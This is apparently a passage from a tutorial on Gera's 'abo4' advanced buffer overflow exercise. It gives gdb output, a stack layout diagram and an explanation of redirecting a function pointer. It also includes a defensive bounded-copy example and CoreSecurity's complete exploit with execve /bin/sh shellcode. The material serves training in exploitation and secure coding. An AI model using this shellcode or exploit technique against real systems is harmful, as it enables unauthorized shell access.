0x080482e4->0x080482ec at 0x000002e4: .rel.dyn
0x080482ec->0x0804832c at 0x000002ec: .rel.plt
0x0804832c->0x08048351 at 0x0000032c: .init
0x08048354->0x080483e4 at 0x00000354: .plt
0x080483f0->0x0804859c at 0x000003f0: .text
0x0804859c->0x080485b8 at 0x0000059c: .fini

0x080485b8->0x080485c0 at 0x000005b8: .rodata
0x080495c0->0x080495d0 at 0x000005c0: .data
0x080495d0->0x08049618 at 0x000005d0: .eh_frame
0x08049618->0x080496e0 at 0x00000618: .dynamic
0x080496e0->0x080496e8 at 0x000006e0: .ctors
0x080496e8->0x080496f0 at 0x000006e8: .dtors
0x080496f0->0x08049720 at 0x000006f0: .got
0x08049720->0x08049738 at 0x00000720: .bss
[Some part of output was removed. It's not needed anyway]
(gdb) x/x 0x080495cc
0x80495cc <force_to_data>: 0x08048384
(gdb) x/x 0x08048384
0x8048384 <puts>: 0x970425ff
(gdb)
0x8048388 <puts+4>: 0x10680804
(gdb)
0x804838c <puts+8>: 0xe9000000
(gdb) q
The program is running. Exit anyway? (y or n) y
user@CoreLabs:~/gera$

When the operating system loads the program into memory and runs it, the memory image of the corresponding process looks like the figure below.

0xbfffffff ---> +--------------------------------------+
                |                                      |
                +--------------------------------------+ <--
                |              shellcode               |   |
                +--------------------------------------+   |
                |                                      |   |
                +--------------------------------------+   |
          ---   |           address of pbuf            |   |
           |    +--------------------------------------+   |
           |    |               buf[256]               |   |
           |    |                                      |   |
           |    |               AAAAAAAA               |   |
           |    |               AAAAAAAA               |   |
  stack    |    +--------------------------------------+   |
  growth   |    |                                      |   |
  direction|    |                                      |   |
           |    |                                      |   |
           |    +--------------------------------------+   |
           |    |                  fn                  |   |
          ----> +--------------------------------------+  ---
                |                                      |
          /|\   +--------------------------------------+
           |    |                .fini                 |
           |    +--------------------------------------+
  heap     |    |                .text                 |
  growth   |    +--------------------------------------+
  direction|    |                .plt                  |
           |    +--------------------------------------+
                |                                      |
0x08000000 ---> +--------------------------------------+

The first strcpy() is used to overwrite pbuf, the pointer to the dynamically allocated buffer (it is declared right before buf[256]), so the attacker controls the destination of the second strcpy() and can copy the data in the second argument, argc[2], to any address. The usual choice is to overwrite the function pointer fn at 0x080495cc, which at this point holds 0x08048384, the address of puts(); the attacker changes it in memory so that it points to the shellcode.
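The overwrite described above is possible only because both strcpy() calls copy without checking the size of their destination. As an added example (not from the original page or from CoreSecurity's exploit), the following C program reproduces the two adjacent objects, a 256-byte buffer followed by a heap pointer, and replaces the unbounded copy with a length-checked one, so an argument of 256 bytes or more is rejected and the pointer keeps its value. The names struct frame, copy_bounded, frame_copy_rc and frame_pointer_intact_after are this example's own, and the over-long input is constructed inside the code.

```c
/* Added example, not code from the original page: a bounded copy that
 * leaves the pointer stored after the buffer intact. The names below
 * (struct frame, copy_bounded, run_frame, ...) are this example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 256

/* The two objects abo4 keeps next to each other: a fixed-size buffer and
 * the pointer to a malloc'd block. A struct pins the adjacency so the
 * demonstration does not depend on the compiler's stack layout. */
struct frame {
    char buf[BUF_LEN];
    char *pbuf;
};

/* Bounded replacement for strcpy(dst, src): refuses any source that does
 * not fit in dst together with its terminator. Returns 0 on success and
 * -1 when rejected; dst is left untouched on rejection. */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (dst_len == 0 || n >= dst_len)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Build a frame whose pbuf points at a heap block, then copy a constructed
 * argument of input_len 'A's into buf with copy_bounded(). Reports the copy
 * result in *rc and whether pbuf still holds the original address in
 * *intact. Returns 0 only if the constructed input could not be allocated. */
static int run_frame(size_t input_len, int *rc, int *intact)
{
    struct frame f;
    char *heap = malloc(16);
    char *input = malloc(input_len + 1);

    if (heap == NULL || input == NULL) {
        free(heap);
        free(input);
        return 0;
    }
    f.pbuf = heap;
    memset(input, 'A', input_len);   /* constructed input, like the exploit's junk */
    input[input_len] = '\0';

    *rc = copy_bounded(f.buf, sizeof f.buf, input);
    *intact = (f.pbuf == heap);

    free(input);
    free(heap);
    return 1;
}

/* Result of the bounded copy for an input of input_len bytes: 0 if it fit,
 * -1 if it was rejected (as a 260-byte argument is). */
int frame_copy_rc(size_t input_len)
{
    int rc = -2, intact = 0;
    if (!run_frame(input_len, &rc, &intact))
        return -2;
    return rc;
}

/* 1 if pbuf survives the attempted copy unchanged; with a bounded copy
 * this holds for every input length. */
int frame_pointer_intact_after(size_t input_len)
{
    int rc = 0, intact = 0;
    if (!run_frame(input_len, &rc, &intact))
        return 0;
    return intact;
}

int main(void)
{
    printf("255 bytes: rc=%d, pointer intact=%d\n",
           frame_copy_rc(255), frame_pointer_intact_after(255));
    printf("260 bytes: rc=%d, pointer intact=%d\n",
           frame_copy_rc(260), frame_pointer_intact_after(260));
    return 0;
}
```

The check compares the source length against the destination size before anything is written, which is the property the original program lacks: with it in place, the 261-byte first argument built by the exploit below never reaches the pointer that follows buf.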

The corresponding exploit follows:
/*
** exp4.c
** Coded by CoreSecurity - info@core-sec.com
*/

#include <string.h>
#include <unistd.h>

#define BUFSIZE1 261                /* 256 bytes of buf + 4-byte pointer + NUL */
#define BUFSIZE2 5                  /* 4-byte address + NUL */
#define FN_ADDRESS 0x080495cc       /* Address of fn() */

/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void) {

    char evil_buffer1[BUFSIZE1];
    char evil_buffer2[BUFSIZE2];
    char *env[3]={shellcode,NULL};  /* shellcode is the only environment string */
    char *p;

    /* Calculating address of shellcode */
    int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo4");

    /* Constructing first buffer */
    p=evil_buffer1;
    memset(p,'A',256);              // Some junk
    p+=256;

    *((void **)p)=(void *)(FN_ADDRESS);  /* replaces pbuf with the address of fn */
    p+=4;
    *p='\0';

    /* Constructing second buffer */
    p=evil_buffer2;
    *((void **)p)=(void *)(ret);    /* copied through pbuf, i.e. written into fn */
    p+=4;
    *p='\0';

    /* The path must be the same one used in the address calculation above */
    execle("/home/user/gera/abo4","abo4",evil_buffer1,evil_buffer2,"A",NULL,env);
    return 0;
}

Analysis of Advanced Buffer Overflow 5
Source code:

/* abo5.c *
* specially crafted to feed your brain by gera@core